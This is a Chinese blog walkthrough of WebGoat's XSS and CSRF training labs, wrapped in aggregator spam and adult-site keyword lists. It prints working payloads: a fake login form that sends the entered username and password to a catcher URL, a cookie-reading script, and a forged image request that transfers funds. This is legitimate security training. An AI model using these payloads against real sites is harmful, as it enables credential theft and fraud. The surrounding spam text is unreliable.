日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

WebGoat系列实验Cross-Site Scripting (XSS)

發(fā)布時(shí)間:2025/5/22 编程问答 15 豆豆
生活随笔 收集整理的這篇文章主要介紹了 WebGoat系列实验Cross-Site Scripting (XSS) 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

WebGoat系列實(shí)驗(yàn)Cross-Site Scripting (XSS)

PhishingTitle

  • 本次實(shí)驗(yàn)是在一個(gè)已知存在XSS漏洞的頁面進(jìn)行釣魚攻擊。通過使用XSS與HTML注入,在頁面中注入身份認(rèn)證html代碼,添加javascript腳本收集身份認(rèn)證信息,并發(fā)送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes...
  • 輸入以下javascript代碼。(之前這個(gè)位置提交的javascript代碼沒有顯示出來,原來是因?yàn)樵创a被過濾掉了...)
  • </form><script>function hack(){image=new Image;image.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&username="+document.phish.username.value+"&password="+document.phish.password.value+"";alert("PHISHING!");}</script><form name = "phish"><br><HR><H3>This feature requires account login:</H3><br>Enter Username:<br><input type="text" name="username"><br>Enter Password:<br><input type="password" name="password"><br><input type="submit" name=login value="login" onclick=hack()></form><br><HR>
  • 在偽造的輸入框中輸入用戶名與密碼,點(diǎn)擊login按鈕,用戶的登錄認(rèn)證信息就被發(fā)送到構(gòu)造的頁面中了。
  • LAB: Cross Site Scripting

    Stage 1:Stored XSS

  • 作為Tom,在個(gè)人簡介編輯頁執(zhí)行存儲型XSS攻擊,驗(yàn)證Jerry會(huì)受到攻擊影響。
  • 使用Tom登錄,修改Tom的個(gè)人簡介編輯頁的街道一欄,在其后添加,更新個(gè)人信息。
  • 使用Jerry登錄,選擇Tom的個(gè)人信息進(jìn)行查看,彈窗表明存儲型XSS攻擊成功。
  • Stage 2:Block Stored XSS using Input Validation

    THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

    Stage3:Stored XSS Revisited

    驗(yàn)證Bruce的個(gè)人簡介中包含有XSS攻擊,使用David用戶登錄,查看Bruce的個(gè)人簡介,出現(xiàn)彈窗,表明存在XSS攻擊。

    Stage4:Block Stored XSS using Output Encoding

    THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

    Stage5:Reflected XSS

  • 利用查找職工頁面的缺陷制作一個(gè)包含有反射型XSS的URL,驗(yàn)證其他使用這個(gè)鏈接的用戶也會(huì)受到攻擊影響。
  • 使用用戶Larry登錄,在Search Staff搜索框中輸入。
  • Stage6:Block Reflected XSS

    THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

    Stored XSS Attacks

  • 清除所有的輸入是一個(gè)很好的選擇,尤其是清除那些將被用作參數(shù)使用的輸入。對于在應(yīng)用程序中永久存儲的內(nèi)容特別重要。當(dāng)用戶的消息被檢索時(shí),不能出現(xiàn)不期望的消息內(nèi)容。
  • 在輸入的內(nèi)容中添加javascript代碼,點(diǎn)擊Submit按鈕。
  • 點(diǎn)擊生成的文章鏈接,會(huì)顯示一個(gè)彈窗,表明頁面存在存儲型XSS。
  • Reflected XSS Attacks

  • 在服務(wù)器端驗(yàn)證所有輸入是一個(gè)很好的選擇。未驗(yàn)證的用戶輸入可能會(huì)在HTTP響應(yīng)中出現(xiàn)XSS。攻擊者可以創(chuàng)建一個(gè)URL,通過讓受害者點(diǎn)擊的方式進(jìn)行XSS攻擊。
  • 在digit access code框中添加
  • <script>alert(document.cookie);</script>

    ,點(diǎn)擊Purchase按鈕完成。

    Cross Site Request Forgery (CSRF)

  • 實(shí)驗(yàn)需要向新聞組發(fā)送一封email。在email中包含一張圖片,圖片的URL指向一個(gè)惡意請求。實(shí)驗(yàn)中,URL應(yīng)指向attack servlet,參數(shù)有Screen與menu,還有一個(gè)額外的參數(shù)transferFunds帶有任意數(shù)值。收件人剛好進(jìn)行身份認(rèn)證,正在轉(zhuǎn)移資金。
  • 構(gòu)造一封郵件,在Message后添加一張圖片,根據(jù)Screen與menu值構(gòu)造URL,圖片的javascript代碼為
  • <img src="attack?Screen=2078372&menu=900&transferFunds=5000"/>

  • 當(dāng)收件人打開這封email時(shí),由于自身身份已經(jīng)認(rèn)證,因此賬戶被轉(zhuǎn)移了5000。
  • CSRF Prompt By-Pass

  • 實(shí)驗(yàn)需要向新聞組發(fā)送email包含以下惡意請求,首先轉(zhuǎn)賬,然后請求提示確認(rèn)。
  • 在email的正文中輸入如下javascript代碼。
  • CSRF Token By-Pass

    轉(zhuǎn)載于:https://www.cnblogs.com/yangmzh3/p/7542018.html

    總結(jié)

    以上是生活随笔為你收集整理的WebGoat系列实验Cross-Site Scripting (XSS)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 老汉色老汉首页av亚洲 | 99久久久无码国产精品性黑人 | 欧美精品偷拍 | xx久久 | 中文字幕在线观 | 少妇视频网 | 国产精品无码av在线有声小说 | 天堂资源最新在线 | 成人在线免费视频观看 | 黄色录像片子 | 电影《走路上学》免费 | 黄色录像二级片 | 高潮一区| 一级美女视频 | 午夜小视频在线观看 | 欧美亚洲一二三区 | 国产区视频 | 久久久久在线视频 | 欧美日韩成人一区二区在线观看 | 亚洲一区二区免费看 | 日韩一区二区高清视频 | 久久久人人人 | 欧美午夜三级 | 午夜精品福利在线观看 | 一区二区免费在线观看 | 国产黄色免费观看 | 99久热在线精品996热是什么 | 国产一区二区三区精品视频 | 成人精品一区二区三区电影黑人 | 国产乱仑 | 最新日本中文字幕 | av永久 | 色哟哟国产精品 | 天狂传说之巴啦啦小魔仙 | 日本黄色免费在线观看 | 91免费污视频 | 动漫美女视频 | 日韩在线视频你懂的 | 一级性生活免费视频 | 怒海潜沙秦岭神树 | 成年人黄色网址 | 114国产精品久久免费观看 | 美日韩丰满少妇在线观看 | 欧美激情va永久在线播放 | 国产成人精品免高潮费视频 | 精品久久久久久无码中文野结衣 | 99成人国产精品视频 | 久久久久久久久久久久久久久久久久久久 | 国产精品一二 | av成人免费| 日吊视频 | 亚洲精品a | 日韩欧美中文字幕精品 | 久久999 | 午夜裸体性播放 | 97国产在线播放 | 视频一区国产 | av有码在线观看 | 老色鬼av| 91蝌蚪少妇 | 中文字幕第31页 | 久久精品国产免费 | 精品国产69| 国精产品一区二区 | 国产午夜免费福利 | 在线成人一区二区 | 一区二区三区四区五区视频 | 天天爱夜夜爽 | 国产精品欧美精品 | 伊人影院av| 欧美成欧美va | 国产一级久久 | 热99精品| 91久久久久国产一区二区 | 五月天婷婷激情网 | 欧美性生活视频 | 色婷婷社区 | 一区二区三区四区精品 | 十八岁世界在线观看高清免费韩剧 | 亚洲一区二区激情 | 大尺度做爰呻吟舌吻网站 | 色婷婷丁香 | 在线中文字幕第一页 | 每日更新av| 国产精品熟妇一区二区三区四区 | 99干99| 日本特级毛片 | 日日操夜夜摸 | 亚洲欧美另类日本 | 欧美操穴| 欧美精品久久久久久久久老牛影院 | 99精品一区二区三区 | 黄色骚视频| 精品人妻一区二区三区潮喷在线 | 欧美第一页 | 成人午夜精品 | 午夜精品久久久久久久久久久 | 在线观看污视频网站 | 日日夜夜免费精品视频 |